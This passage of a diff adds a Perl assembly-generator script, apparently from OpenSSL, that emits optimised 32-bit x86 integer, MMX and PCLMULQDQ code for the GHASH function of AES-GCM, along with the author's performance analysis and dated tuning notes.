+# a while we can assume that asymptotic performance can be estimated
+# as (28+Tmod/Naggr)/16, where Tmod is time to perform reduction
+# and Naggr is the aggregation factor.
+#
+# Before we proceed to this implementation let's have closer look at
+# the best-performing code suggested by Intel in their white paper.
+# By tracing inter-register dependencies Tmod is estimated as ~19
+# cycles and Naggr chosen by Intel is 4, resulting in 2.05 cycles per
+# processed byte. As implied, this is quite optimistic estimate,
+# because it does not account for Karatsuba pre- and post-processing,
+# which for a single multiplication is ~5 cycles. Unfortunately Intel
+# does not provide performance data for GHASH alone. But benchmarking
+# AES_GCM_encrypt ripped out of Fig. 15 of the white paper with aadt
+# alone resulted in 2.46 cycles per byte of out 16KB buffer. Note that
+# the result accounts even for pre-computing of degrees of the hash
+# key H, but its portion is negligible at 16KB buffer size.
+#
+# Moving on to the implementation in question. Tmod is estimated as
+# ~13 cycles and Naggr is 2, giving asymptotic performance of ...
+# 2.16. How is it possible that measured performance is better than
+# optimistic theoretical estimate? There is one thing Intel failed
+# to recognize. By serializing GHASH with CTR in same subroutine
+# former's performance is really limited to above (Tmul + Tmod/Naggr)
+# equation. But if GHASH procedure is detached, the modulo-reduction
+# can be interleaved with Naggr-1 multiplications at instruction level
+# and under ideal conditions even disappear from the equation. So that
+# optimistic theoretical estimate for this implementation is ...
+# 28/16=1.75, and not 2.16. Well, it's probably way too optimistic,
+# at least for such small Naggr. I'd argue that (28+Tproc/Naggr),
+# where Tproc is time required for Karatsuba pre- and post-processing,
+# is more realistic estimate. In this case it gives ... 1.91 cycles.
+# Or in other words, depending on how well we can interleave reduction
+# and one of the two multiplications the performance should be betwen
+# 1.91 and 2.16. As already mentioned, this implementation processes
+# one byte out of 8KB buffer in 2.10 cycles, while x86_64 counterpart
+# - in 2.02. x86_64 performance is better, because larger register
+# bank allows to interleave reduction and multiplication better.
+#
+# Does it make sense to increase Naggr? To start with it's virtually
+# impossible in 32-bit mode, because of limited register bank
+# capacity. Otherwise improvement has to be weighed agiainst slower
+# setup, as well as code size and complexity increase. As even
+# optimistic estimate doesn't promise 30% performance improvement,
+# there are currently no plans to increase Naggr.
+#
+# Special thanks to David Woodhouse <dwmw2@infradead.org> for
+# providing access to a Westmere-based system on behalf of Intel
+# Open Source Technology Centre.
+
+# January 2010
+#
+# Tweaked to optimize transitions between integer and FP operations
+# on same XMM register, PCLMULQDQ subroutine was measured to process
+# one byte in 2.07 cycles on Sandy Bridge, and in 2.12 - on Westmere.
+# The minor regression on Westmere is outweighed by ~15% improvement
+# on Sandy Bridge. Strangely enough attempt to modify 64-bit code in
+# similar manner resulted in almost 20% degradation on Sandy Bridge,
+# where original 64-bit code processes one byte in 1.95 cycles.
+
+#####################################################################
+# For reference, AMD Bulldozer processes one byte in 1.98 cycles in
+# 32-bit mode and 1.89 in 64-bit.
+
+# February 2013
+#
+# Overhaul: aggregate Karatsuba post-processing, improve ILP in
+# reduction_alg9. Resulting performance is 1.96 cycles per byte on
+# Westmere, 1.95 - on Sandy/Ivy Bridge, 1.76 - on Bulldozer.
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],"ghash-x86.pl",$x86only = $ARGV[$#ARGV] eq "386");
+
+$sse2=0;
+for (@ARGV) { $sse2=1 if (/-DOPENSSL_IA32_SSE2/); }
+
+($Zhh,$Zhl,$Zlh,$Zll) = ("ebp","edx","ecx","ebx");
+$inp  = "edi";
+$Htbl = "esi";
+
+$unroll = 0;	# Affects x86 loop. Folded loop performs ~7% worse
+		# than unrolled, which has to be weighted against
+		# 2.5x x86-specific code size reduction.
+
+sub x86_loop {
+    my $off = shift;
+    my $rem = "eax";
+
+	&mov	($Zhh,&DWP(4,$Htbl,$Zll));
+	&mov	($Zhl,&DWP(0,$Htbl,$Zll));
+	&mov	($Zlh,&DWP(12,$Htbl,$Zll));
+	&mov	($Zll,&DWP(8,$Htbl,$Zll));
+	&xor	($rem,$rem);	# avoid partial register stalls on PIII
+
+	# shrd practically kills P4, 2.5x deterioration, but P4 has
+	# MMX code-path to execute. shrd runs tad faster [than twice
+	# the shifts, move's and or's] on pre-MMX Pentium (as well as
+	# PIII and Core2), *but* minimizes code size, spares register
+	# and thus allows to fold the loop...
+	if (!$unroll) {
+	my $cnt = $inp;
+	&mov	($cnt,15);
+	&jmp	(&label("x86_loop"));
+	&set_label("x86_loop",16);
+	    for($i=1;$i<=2;$i++) {
+		&mov	(&LB($rem),&LB($Zll));
+		&shrd	($Zll,$Zlh,4);
+		&and	(&LB($rem),0xf);
+		&shrd	($Zlh,$Zhl,4);
+		&shrd	($Zhl,$Zhh,4);
+		&shr	($Zhh,4);
+		&xor	($Zhh,&DWP($off+16,"esp",$rem,4));
+
+		&mov	(&LB($rem),&BP($off,"esp",$cnt));
+		if ($i&1) {
+			&and	(&LB($rem),0xf0);
+		} else {
+			&shl	(&LB($rem),4);
+		}
+
+		&xor	($Zll,&DWP(8,$Htbl,$rem));
+		&xor	($Zlh,&DWP(12,$Htbl,$rem));
+		&xor	($Zhl,&DWP(0,$Htbl,$rem));
+		&xor	($Zhh,&DWP(4,$Htbl,$rem));
+
+		if ($i&1) {
+			&dec	($cnt);
+			&js	(&label("x86_break"));
+		} else {
+			&jmp	(&label("x86_loop"));
+		}
+	    }
+	&set_label("x86_break",16);
+	} else {
+	    for($i=1;$i<32;$i++) {
+		&comment($i);
+		&mov	(&LB($rem),&LB($Zll));
+		&shrd	($Zll,$Zlh,4);
+		&and	(&LB($rem),0xf);
+		&shrd	($Zlh,$Zhl,4);
+		&shrd	($Zhl,$Zhh,4);
+		&shr	($Zhh,4);
+		&xor	($Zhh,&DWP($off+16,"esp",$rem,4));
+
+		if ($i&1) {
+			&mov	(&LB($rem),&BP($off+15-($i>>1),"esp"));
+			&and	(&LB($rem),0xf0);
+		} else {
+			&mov	(&LB($rem),&BP($off+15-($i>>1),"esp"));
+			&shl	(&LB($rem),4);
+		}
+
+		&xor	($Zll,&DWP(8,$Htbl,$rem));
+		&xor	($Zlh,&DWP(12,$Htbl,$rem));
+		&xor	($Zhl,&DWP(0,$Htbl,$rem));
+		&xor	($Zhh,&DWP(4,$Htbl,$rem));
+	    }
+	}
+	&bswap	($Zll);
+	&bswap	($Zlh);
+	&bswap	($Zhl);
+	if (!$x86only) {
+		&bswap	($Zhh);
+	} else {
+		&mov	("eax",$Zhh);
+		&bswap	("eax");
+		&mov	($Zhh,"eax");
+	}
+}
+
+if ($unroll) {
+    &function_begin_B("_x86_gmult_4bit_inner");
+	&x86_loop(4);
+	&ret	();
+    &function_end_B("_x86_gmult_4bit_inner");
+}
+
+sub deposit_rem_4bit {
+    my $bias = shift;
+
+	&mov	(&DWP($bias+0, "esp"),0x0000<<16);
+	&mov	(&DWP($bias+4, "esp"),0x1C20<<16);
+	&mov	(&DWP($bias+8, "esp"),0x3840<<16);
+	&mov	(&DWP($bias+12,"esp"),0x2460<<16);
+	&mov	(&DWP($bias+16,"esp"),0x7080<<16);
+	&mov	(&DWP($bias+20,"esp"),0x6CA0<<16);
+	&mov	(&DWP($bias+24,"esp"),0x48C0<<16);
+	&mov	(&DWP($bias+28,"esp"),0x54E0<<16);
+	&mov	(&DWP($bias+32,"esp"),0xE100<<16);
+	&mov	(&DWP($bias+36,"esp"),0xFD20<<16);
+	&mov	(&DWP($bias+40,"esp"),0xD940<<16);
+	&mov	(&DWP($bias+44,"esp"),0xC560<<16);
+	&mov	(&DWP($bias+48,"esp"),0x9180<<16);
+	&mov	(&DWP($bias+52,"esp"),0x8DA0<<16);
+	&mov	(&DWP($bias+56,"esp"),0xA9C0<<16);
+	&mov	(&DWP($bias+60,"esp"),0xB5E0<<16);
+}
+
+$suffix = $x86only ? "" : "_x86";
+
+&function_begin("gcm_gmult_4bit".$suffix);
+	&stack_push(16+4+1);			# +1 for stack alignment
+	&mov	($inp,&wparam(0));		# load Xi
+	&mov	($Htbl,&wparam(1));		# load Htable
+
+	&mov	($Zhh,&DWP(0,$inp));		# load Xi[16]
+	&mov	($Zhl,&DWP(4,$inp));
+	&mov	($Zlh,&DWP(8,$inp));
+	&mov	($Zll,&DWP(12,$inp));
+
+	&deposit_rem_4bit(16);
+
+	&mov	(&DWP(0,"esp"),$Zhh);		# copy Xi[16] on stack
+	&mov	(&DWP(4,"esp"),$Zhl);
+	&mov	(&DWP(8,"esp"),$Zlh);
+	&mov	(&DWP(12,"esp"),$Zll);
+	&shr	($Zll,20);
+	&and	($Zll,0xf0);
+
+	if ($unroll) {
+		&call	("_x86_gmult_4bit_inner");
+	} else {
+		&x86_loop(0);
+		&mov	($inp,&wparam(0));
+	}
+
+	&mov	(&DWP(12,$inp),$Zll);
+	&mov	(&DWP(8,$inp),$Zlh);
+	&mov	(&DWP(4,$inp),$Zhl);
+	&mov	(&DWP(0,$inp),$Zhh);
+	&stack_pop(16+4+1);
+&function_end("gcm_gmult_4bit".$suffix);
+
+&function_begin("gcm_ghash_4bit".$suffix);
+	&stack_push(16+4+1);			# +1 for 64-bit alignment
+	&mov	($Zll,&wparam(0));		# load Xi
+	&mov	($Htbl,&wparam(1));		# load Htable
+	&mov	($inp,&wparam(2));		# load in
+	&mov	("ecx",&wparam(3));		# load len
+	&add	("ecx",$inp);
+	&mov	(&wparam(3),"ecx");
+
+	&mov	($Zhh,&DWP(0,$Zll));		# load Xi[16]
+	&mov	($Zhl,&DWP(4,$Zll));
+	&mov	($Zlh,&DWP(8,$Zll));
+	&mov	($Zll,&DWP(12,$Zll));
+
+	&deposit_rem_4bit(16);
+
+    &set_label("x86_outer_loop",16);
+	&xor	($Zll,&DWP(12,$inp));		# xor with input
+	&xor	($Zlh,&DWP(8,$inp));
+	&xor	($Zhl,&DWP(4,$inp));
+	&xor	($Zhh,&DWP(0,$inp));
+	&mov	(&DWP(12,"esp"),$Zll);		# dump it on stack
+	&mov	(&DWP(8,"esp"),$Zlh);
+	&mov	(&DWP(4,"esp"),$Zhl);
+	&mov	(&DWP(0,"esp"),$Zhh);
+
+	&shr	($Zll,20);
+	&and	($Zll,0xf0);
+
+	if ($unroll) {
+		&call	("_x86_gmult_4bit_inner");
+	} else {
+		&x86_loop(0);
+		&mov	($inp,&wparam(2));
+	}
+	&lea	($inp,&DWP(16,$inp));
+	&cmp	($inp,&wparam(3));
+	&mov	(&wparam(2),$inp)	if (!$unroll);
+	&jb	(&label("x86_outer_loop"));
+
+	&mov	($inp,&wparam(0));	# load Xi
+	&mov	(&DWP(12,$inp),$Zll);
+	&mov	(&DWP(8,$inp),$Zlh);
+	&mov	(&DWP(4,$inp),$Zhl);
+	&mov	(&DWP(0,$inp),$Zhh);
+	&stack_pop(16+4+1);
+&function_end("gcm_ghash_4bit".$suffix);
+
+if (!$x86only) {{{
+
+&static_label("rem_4bit");
+
+if (!$sse2) {{	# pure-MMX "May" version...
+
+$S=12;		# shift factor for rem_4bit
+
+&function_begin_B("_mmx_gmult_4bit_inner");
+# MMX version performs 3.5 times better on P4 (see comment in non-MMX
+# routine for further details), 100% better on Opteron, ~70% better
+# on Core2 and PIII... In other words effort is considered to be well
+# spent... Since initial release the loop was unrolled in order to
+# "liberate" register previously used as loop counter. Instead it's
+# used to optimize critical path in 'Z.hi ^= rem_4bit[Z.lo&0xf]'.
+# The path involves move of Z.lo from MMX to integer register,
+# effective address calculation and finally merge of value to Z.hi.
+# Reference to rem_4bit is scheduled so late that I had to >>4
+# rem_4bit elements. This resulted in 20-45% procent improvement
+# on contemporary µ-archs.
+{
+    my $cnt;
+    my $rem_4bit = "eax";
+    my @rem = ($Zhh,$Zll);
+    my $nhi = $Zhl;
+    my $nlo = $Zlh;
+
+    my ($Zlo,$Zhi) = ("mm0","mm1");
+    my $tmp = "mm2";
+
+	&xor	($nlo,$nlo);	# avoid partial register stalls on PIII
+	&mov	($nhi,$Zll);
+	&mov	(&LB($nlo),&LB($nhi));
+	&shl	(&LB($nlo),4);
+	&and	($nhi,0xf0);
+	&movq	($Zlo,&QWP(8,$Htbl,$nlo));
+	&movq	($Zhi,&QWP(0,$Htbl,$nlo));
+	&movd	($rem[0],$Zlo);
+
+	for ($cnt=28;$cnt>=-2;$cnt--) {
+	    my $odd = $cnt&1;
+	    my $nix = $odd ? $nlo : $nhi;
+
+		&shl	(&LB($nlo),4)			if ($odd);
+		&psrlq	($Zlo,4);
+		&movq	($tmp,$Zhi);
+		&psrlq	($Zhi,4);
+		&pxor	($Zlo,&QWP(8,$Htbl,$nix));
+		&mov	(&LB($nlo),&BP($cnt/2,$inp))	if (!$odd && $cnt>=0);
+		&psllq	($tmp,60);
+		&and	($nhi,0xf0)			if ($odd);
+		&pxor	($Zhi,&QWP(0,$rem_4bit,$rem[1],8)) if ($cnt<28);
+		&and	($rem[0],0xf);
+		&pxor	($Zhi,&QWP(0,$Htbl,$nix));
+		&mov	($nhi,$nlo)			if (!$odd && $cnt>=0);
+		&movd	($rem[1],$Zlo);
+		&pxor	($Zlo,$tmp);
+
+		push	(@rem,shift(@rem));		# "rotate" registers
+	}
+
+	&mov	($inp,&DWP(4,$rem_4bit,$rem[1],8));	# last rem_4bit[rem]
+
+	&psrlq	($Zlo,32);	# lower part of Zlo is already there
+	&movd	($Zhl,$Zhi);
+	&psrlq	($Zhi,32);
+	&movd	($Zlh,$Zlo);
+	&movd	($Zhh,$Zhi);
+	&shl	($inp,4);	# compensate for rem_4bit[i] being >>4
+
+	&bswap	($Zll);
+	&bswap	($Zhl);
+	&bswap	($Zlh);
+	&xor	($Zhh,$inp);
+	&bswap	($Zhh);
+
+	&ret	();
+}
+&function_end_B("_mmx_gmult_4bit_inner");
+
+&function_begin("gcm_gmult_4bit_mmx");
+	&mov	($inp,&wparam(0));	# load Xi
+	&mov	($Htbl,&wparam(1));	# load Htable
+
+	&call	(&label("pic_point"));
+	&set_label("pic_point");
+	&blindpop("eax");
+	&lea	("eax",&DWP(&label("rem_4bit")."-".&label("pic_point"),"eax"));
+
+	&movz	($Zll,&BP(15,$inp));
+
+	&call	("_mmx_gmult_4bit_inner");
+
+	&mov	($inp,&wparam(0));	# load Xi
+	&emms	();
+	&mov	(&DWP(12,$inp),$Zll);
+	&mov	(&DWP(4,$inp),$Zhl);
+	&mov	(&DWP(8,$inp),$Zlh);
+	&mov	(&DWP(0,$inp),$Zhh);
+&function_end("gcm_gmult_4bit_mmx");
+
+# Streamed version performs 20% better on P4, 7% on Opteron,
+# 10% on Core2 and PIII...
+&function_begin("gcm_ghash_4bit_mmx");
+	&mov	($Zhh,&wparam(0));	# load Xi
+	&mov	($Htbl,&wparam(1));	# load Htable
+	&mov	($inp,&wparam(2));	# load in
+	&mov	($Zlh,&wparam(3));	# load len
+
+	&call	(&label("pic_point"));
+	&set_label("pic_point");
+	&blindpop("eax");
+	&lea	("eax",&DWP(&label("rem_4bit")."-".&label("pic_point"),"eax"));
+
+	&add	($Zlh,$inp);
+	&mov	(&wparam(3),$Zlh);	# len to point at the end of input
+	&stack_push(4+1);		# +1 for stack alignment
+
+	&mov	($Zll,&DWP(12,$Zhh));	# load Xi[16]
+	&mov	($Zhl,&DWP(4,$Zhh));
+	&mov	($Zlh,&DWP(8,$Zhh));
+	&mov	($Zhh,&DWP(0,$Zhh));
+	&jmp	(&label("mmx_outer_loop"));
+
+    &set_label("mmx_outer_loop",16);
+	&xor	($Zll,&DWP(12,$inp));
+	&xor	($Zhl,&DWP(4,$inp));
+	&xor	($Zlh,&DWP(8,$inp));
+	&xor	($Zhh,&DWP(0,$inp));
+	&mov	(&wparam(2),$inp);
+	&mov	(&DWP(12,"esp"),$Zll);
+	&mov	(&DWP(4,"esp"),$Zhl);
+	&mov	(&DWP(8,"esp"),$Zlh);
+	&mov	(&DWP(0,"esp"),$Zhh);
+
+	&mov	($inp,"esp");
+	&shr	($Zll,24);
+
+	&call	("_mmx_gmult_4bit_inner");
+
+	&mov	($inp,&wparam(2));
+	&lea	($inp,&DWP(16,$inp));
+	&cmp	($inp,&wparam(3));
+	&jb	(&label("mmx_outer_loop"));
+
+	&mov	($inp,&wparam(0));	# load Xi
+	&emms	();
+	&mov	(&DWP(12,$inp),$Zll);
+	&mov	(&DWP(4,$inp),$Zhl);
+	&mov	(&DWP(8,$inp),$Zlh);
+	&mov	(&DWP(0,$inp),$Zhh);
+
+	&stack_pop(4+1);
+&function_end("gcm_ghash_4bit_mmx");
+
+}} else {{	# "June" MMX version...
+		# ... has slower "April" gcm_gmult_4bit_mmx with folded
+		# loop. This is done to conserve code size...
+$S=16;		# shift factor for rem_4bit
+
+sub mmx_loop() {
+# MMX version performs 2.8 times better on P4 (see comment in non-MMX
+# routine for further details), 40% better on Opteron and Core2, 50%
+# better on PIII... In other words effort is considered to be well
+# spent...
+    my $inp = shift;
+    my $rem_4bit = shift;
+    my $cnt = $Zhh;
+    my $nhi = $Zhl;
+    my $nlo = $Zlh;
+    my $rem = $Zll;
+
+    my ($Zlo,$Zhi) = ("mm0","mm1");
+    my $tmp = "mm2";
+
+	&xor	($nlo,$nlo);	# avoid partial register stalls on PIII
+	&mov	($nhi,$Zll);
+	&mov	(&LB($nlo),&LB($nhi));
+	&mov	($cnt,14);
+	&shl	(&LB($nlo),4);
+	&and	($nhi,0xf0);
+	&movq	($Zlo,&QWP(8,$Htbl,$nlo));
+	&movq	($Zhi,&QWP(0,$Htbl,$nlo));
+	&movd	($rem,$Zlo);
+	&jmp	(&label("mmx_loop"));
+
+    &set_label("mmx_loop",16);
+	&psrlq	($Zlo,4);
+	&and	($rem,0xf);
+	&movq	($tmp,$Zhi);
+	&psrlq	($Zhi,4);
+	&pxor	($Zlo,&QWP(8,$Htbl,$nhi));
+	&mov	(&LB($nlo),&BP(0,$inp,$cnt));
+	&psllq	($tmp,60);
+	&pxor	($Zhi,&QWP(0,$rem_4bit,$rem,8));
+	&dec	($cnt);
+	&movd	($rem,$Zlo);
+	&pxor	($Zhi,&QWP(0,$Htbl,$nhi));
+	&mov	($nhi,$nlo);
+	&pxor	($Zlo,$tmp);
+	&js	(&label("mmx_break"));
+
+	&shl	(&LB($nlo),4);
+	&and	($rem,0xf);
+	&psrlq	($Zlo,4);
+	&and	($nhi,0xf0);
+	&movq	($tmp,$Zhi);
+	&psrlq	($Zhi,4);
+	&pxor	($Zlo,&QWP(8,$Htbl,$nlo));
+	&psllq	($tmp,60);
+	&pxor	($Zhi,&QWP(0,$rem_4bit,$rem,8));
+	&movd	($rem,$Zlo);
+	&pxor	($Zhi,&QWP(0,$Htbl,$nlo));
+	&pxor	($Zlo,$tmp);
+	&jmp	(&label("mmx_loop"));
+
+    &set_label("mmx_break",16);
+	&shl	(&LB($nlo),4);
+	&and	($rem,0xf);
+	&psrlq	($Zlo,4);
+	&and	($nhi,0xf0);
+	&movq	($tmp,$Zhi);
+	&psrlq	($Zhi,4);
+	&pxor	($Zlo,&QWP(8,$Htbl,$nlo));
+	&psllq	($tmp,60);
+	&pxor	($Zhi,&QWP(0,$rem_4bit,$rem,8));
+	&movd	($rem,$Zlo);
+	&pxor	($Zhi,&QWP(0,$Htbl,$nlo));
+	&pxor	($Zlo,$tmp);
+
+	&psrlq	($Zlo,4);
+	&and	($rem,0xf);
+	&movq	($tmp,$Zhi);
+	&psrlq	($Zhi,4);
+	&pxor	($Zlo,&QWP(8,$Htbl,$nhi));
+	&psllq	($tmp,60);
+	&pxor	($Zhi,&QWP(0,$rem_4bit,$rem,8));
+	&movd	($rem,$Zlo);
+	&pxor	($Zhi,&QWP(0,$Htbl,$nhi));
+	&pxor	($Zlo,$tmp);
+
+	&psrlq	($Zlo,32);	# lower part of Zlo is already there
+	&movd	($Zhl,$Zhi);
+	&psrlq	($Zhi,32);
+	&movd	($Zlh,$Zlo);
+	&movd	($Zhh,$Zhi);
+
+	&bswap	($Zll);
+	&bswap	($Zhl);
+	&bswap	($Zlh);
+	&bswap	($Zhh);
+}
+
+&function_begin("gcm_gmult_4bit_mmx");
+	&mov	($inp,&wparam(0));	# load Xi
+	&mov	($Htbl,&wparam(1));	# load Htable
+
+	&call	(&label("pic_point"));
+	&set_label("pic_point");
+	&blindpop("eax");
+	&lea	("eax",&DWP(&label("rem_4bit")."-".&label("pic_point"),"eax"));
+
+	&movz	($Zll,&BP(15,$inp));
+
+	&mmx_loop($inp,"eax");
+
+	&emms	();
+	&mov	(&DWP(12,$inp),$Zll);
+	&mov	(&DWP(4,$inp),$Zhl);
+	&mov	(&DWP(8,$inp),$Zlh);
+	&mov	(&DWP(0,$inp),$Zhh);
+&function_end("gcm_gmult_4bit_mmx");
+
+######################################################################
+# Below subroutine is "528B" variant of "4-bit" GCM GHASH function
+# (see gcm128.c for details). It provides further 20-40% performance
+# improvement over above mentioned "May" version.
+
+&static_label("rem_8bit");
+
+&function_begin("gcm_ghash_4bit_mmx");
+{ my ($Zlo,$Zhi) = ("mm7","mm6");
+  my $rem_8bit = "esi";
+  my $Htbl = "ebx";
+
+    # parameter block
+    &mov	("eax",&wparam(0));		# Xi
+    &mov	("ebx",&wparam(1));		# Htable
+    &mov	("ecx",&wparam(2));		# inp
+    &mov	("edx",&wparam(3));		# len
+    &mov	("ebp","esp");			# original %esp
+    &call	(&label("pic_point"));
+    &set_label	("pic_point");
+    &blindpop	($rem_8bit);
+    &lea	($rem_8bit,&DWP(&label("rem_8bit")."-".&label("pic_point"),$rem_8bit));
+
+    &sub	("esp",512+16+16);		# allocate stack frame...
+    &and	("esp",-64);			# ...and align it
+    &sub	("esp",16);			# place for (u8)(H[]<<4)
+
+    &add	("edx","ecx");			# pointer to the end of input
+    &mov	(&DWP(528+16+0,"esp"),"eax");	# save Xi
+    &mov	(&DWP(528+16+8,"esp"),"edx");	# save inp+len
+    &mov	(&DWP(528+16+12,"esp"),"ebp");	# save original %esp
+
+    { my @lo  = ("mm0","mm1","mm2");
+      my @hi  = ("mm3","mm4","mm5");
+      my @tmp = ("mm6","mm7");
+      my ($off1,$off2,$i) = (0,0,);
+
+      &add	($Htbl,128);			# optimize for size
+      &lea	("edi",&DWP(16+128,"esp"));
+      &lea	("ebp",&DWP(16+256+128,"esp"));
+
+      # decompose Htable (low and high parts are kept separately),
+      # generate Htable[]>>4, (u8)(Htable[]<<4), save to stack...
+      for ($i=0;$i<18;$i++) {
+
+	&mov	("edx",&DWP(16*$i+8-128,$Htbl))		if ($i<16);
+	&movq	($lo[0],&QWP(16*$i+8-128,$Htbl))	if ($i<16);
+	&psllq	($tmp[1],60)				if ($i>1);
+	&movq	($hi[0],&QWP(16*$i+0-128,$Htbl))	if ($i<16);
+	&por	($lo[2],$tmp[1])			if ($i>1);
+	&movq	(&QWP($off1-128,"edi"),$lo[1])		if ($i>0 && $i<17);
+	&psrlq	($lo[1],4)				if ($i>0 && $i<17);
+	&movq	(&QWP($off1,"edi"),$hi[1])		if ($i>0 && $i<17);
+	&movq	($tmp[0],$hi[1])			if ($i>0 && $i<17);
+	&movq	(&QWP($off2-128,"ebp"),$lo[2])		if ($i>1);
+	&psrlq	($hi[1],4)				if ($i>0 && $i<17);
+	&movq	(&QWP($off2,"ebp"),$hi[2])		if ($i>1);
+	&shl	("edx",4)				if ($i<16);
+	&mov	(&BP($i,"esp"),&LB("edx"))		if ($i<16);
+
+	unshift	(@lo,pop(@lo));			# "rotate" registers
+	unshift	(@hi,pop(@hi));
+	unshift	(@tmp,pop(@tmp));
+	$off1 += 8	if ($i>0);
+	$off2 += 8	if ($i>1);
+      }
+    }
+
+    &movq	($Zhi,&QWP(0,"eax"));
+    &mov	("ebx",&DWP(8,"eax"));
+    &mov	("edx",&DWP(12,"eax"));		# load Xi
+
+&set_label("outer",16);
+  { my $nlo = "eax";
+    my $dat = "edx";
+    my @nhi = ("edi","ebp");
+    my @rem = ("ebx","ecx");
+    my @red = ("mm0","mm1","mm2");
+    my $tmp = "mm3";
+
+    &xor	($dat,&DWP(12,"ecx"));		# merge input data
+    &xor	("ebx",&DWP(8,"ecx"));
+    &pxor	($Zhi,&QWP(0,"ecx"));
+    &lea	("ecx",&DWP(16,"ecx"));		# inp+=16
+    #&mov	(&DWP(528+12,"esp"),$dat);	# save inp^Xi
+    &mov	(&DWP(528+8,"esp"),"ebx");
+    &movq	(&QWP(528+0,"esp"),$Zhi);
+    &mov	(&DWP(528+16+4,"esp"),"ecx");	# save inp
+
+    &xor	($nlo,$nlo);
+    &rol	($dat,8);
+    &mov	(&LB($nlo),&LB($dat));
+    &mov	($nhi[1],$nlo);
+    &and	(&LB($nlo),0x0f);
+    &shr	($nhi[1],4);
+    &pxor	($red[0],$red[0]);
+    &rol	($dat,8);			# next byte
+    &pxor	($red[1],$red[1]);
+    &pxor	($red[2],$red[2]);
+
+    # Just like in "May" verson modulo-schedule for critical path in
+    # 'Z.hi ^= rem_8bit[Z.lo&0xff^((u8)H[nhi]<<4)]<<48'. Final 'pxor'
+    # is scheduled so late that rem_8bit[] has to be shifted *right*
+    # by 16, which is why last argument to pinsrw is 2, which
+    # corresponds to <<32=<<48>>16...
+    for ($j=11,$i=0;$i<15;$i++) {
+
+      if ($i>0) {
+	&pxor	($Zlo,&QWP(16,"esp",$nlo,8));		# Z^=H[nlo]
+	&rol	($dat,8);				# next byte
+	&pxor	($Zhi,&QWP(16+128,"esp",$nlo,8));
+
+	&pxor	($Zlo,$tmp);
+	&pxor	($Zhi,&QWP(16+256+128,"esp",$nhi[0],8));
+	&xor	(&LB($rem[1]),&BP(0,"esp",$nhi[0]));	# rem^(H[nhi]<<4)
+      } else {
+	&movq	($Zlo,&QWP(16,"esp",$nlo,8));
+	&movq	($Zhi,&QWP(16+128,"esp",$nlo,8));
+      }
+
+	&mov	(&LB($nlo),&LB($dat));
+	&mov	($dat,&DWP(528+$j,"esp"))		if (--$j%4==0);
+
+	&movd	($rem[0],$Zlo);
+	&movz	($rem[1],&LB($rem[1]))			if ($i>0);
+	&psrlq	($Zlo,8);				# Z>>=8
+
+	&movq	($tmp,$Zhi);
+	&mov	($nhi[0],$nlo);
+	&psrlq	($Zhi,8);
+
+	&pxor	($Zlo,&QWP(16+256+0,"esp",$nhi[1],8));	# Z^=H[nhi]>>4
+	&and	(&LB($nlo),0x0f);
+	&psllq	($tmp,56);
+
+	&pxor	($Zhi,$red[1])				if ($i>1);
+	&shr	($nhi[0],4);
+	&pinsrw	($red[0],&WP(0,$rem_8bit,$rem[1],2),2)	if ($i>0);
+
+	unshift	(@red,pop(@red));			# "rotate" registers
+	unshift	(@rem,pop(@rem));
+	unshift	(@nhi,pop(@nhi));
+    }
+
+    &pxor	($Zlo,&QWP(16,"esp",$nlo,8));		# Z^=H[nlo]
+    &pxor	($Zhi,&QWP(16+128,"esp",$nlo,8));
+    &xor	(&LB($rem[1]),&BP(0,"esp",$nhi[0]));	# rem^(H[nhi]<<4)
+
+    &pxor	($Zlo,$tmp);
+    &pxor	($Zhi,&QWP(16+256+128,"esp",$nhi[0],8));
+    &movz	($rem[1],&LB($rem[1]));
+
+    &pxor	($red[2],$red[2]);			# clear 2nd word
+    &psllq	($red[1],4);
+
+    &movd	($rem[0],$Zlo);
+    &psrlq	($Zlo,4);				# Z>>=4
+
+    &movq	($tmp,$Zhi);
+    &psrlq	($Zhi,4);
+    &shl	($rem[0],4);				# rem<<4
+
+    &pxor	($Zlo,&QWP(16,"esp",$nhi[1],8));	# Z^=H[nhi]
+    &psllq	($tmp,60);
+    &movz	($rem[0],&LB($rem[0]));
+
+    &pxor	($Zlo,$tmp);
+    &pxor	($Zhi,&QWP(16+128,"esp",$nhi[1],8));
+
+    &pinsrw	($red[0],&WP(0,$rem_8bit,$rem[1],2),2);
+    &pxor	($Zhi,$red[1]);
+
+    &movd	($dat,$Zlo);
+    &pinsrw	($red[2],&WP(0,$rem_8bit,$rem[0],2),3);	# last is <<48
+
+    &psllq	($red[0],12);				# correct by <<16>>4
+    &pxor	($Zhi,$red[0]);
+    &psrlq	($Zlo,32);
+    &pxor	($Zhi,$red[2]);
+
+    &mov	("ecx",&DWP(528+16+4,"esp"));	# restore inp
+    &movd	("ebx",$Zlo);
+    &movq	($tmp,$Zhi);			# 01234567
+    &psllw	($Zhi,8);			# 1.3.5.7.
+    &psrlw	($tmp,8);			# .0.2.4.6
+    &por	($Zhi,$tmp);			# 10325476
+    &bswap	($dat);
+    &pshufw	($Zhi,$Zhi,0b00011011);		# 76543210
+    &bswap	("ebx");
+    
+    &cmp	("ecx",&DWP(528+16+8,"esp"));	# are we done?
+    &jne	(&label("outer"));
+  }
+
+    &mov	("eax",&DWP(528+16+0,"esp"));	# restore Xi
+    &mov	(&DWP(12,"eax"),"edx");
+    &mov	(&DWP(8,"eax"),"ebx");
+    &movq	(&QWP(0,"eax"),$Zhi);
+
+    &mov	("esp",&DWP(528+16+12,"esp"));	# restore original %esp
+    &emms	();
+}
+&function_end("gcm_ghash_4bit_mmx");
+}}
+
+if ($sse2) {{
+######################################################################
+# PCLMULQDQ version.
+
+$Xip="eax";
+$Htbl="edx";
+$const="ecx";
+$inp="esi";
+$len="ebx";
+
+($Xi,$Xhi)=("xmm0","xmm1");	$Hkey="xmm2";
+($T1,$T2,$T3)=("xmm3","xmm4","xmm5");
+($Xn,$Xhn)=("xmm6","xmm7");
+
+&static_label("bswap");
+
+sub clmul64x64_T2 {	# minimal "register" pressure
+my ($Xhi,$Xi,$Hkey,$HK)=@_;
+
+	&movdqa		($Xhi,$Xi);		#
+	&pshufd		($T1,$Xi,0b01001110);
+	&pshufd		($T2,$Hkey,0b01001110)	if (!defined($HK));
+	&pxor		($T1,$Xi);		#
+	&pxor		($T2,$Hkey)		if (!defined($HK));
+			$HK=$T2			if (!defined($HK));
+
+	&pclmulqdq	($Xi,$Hkey,0x00);	#######
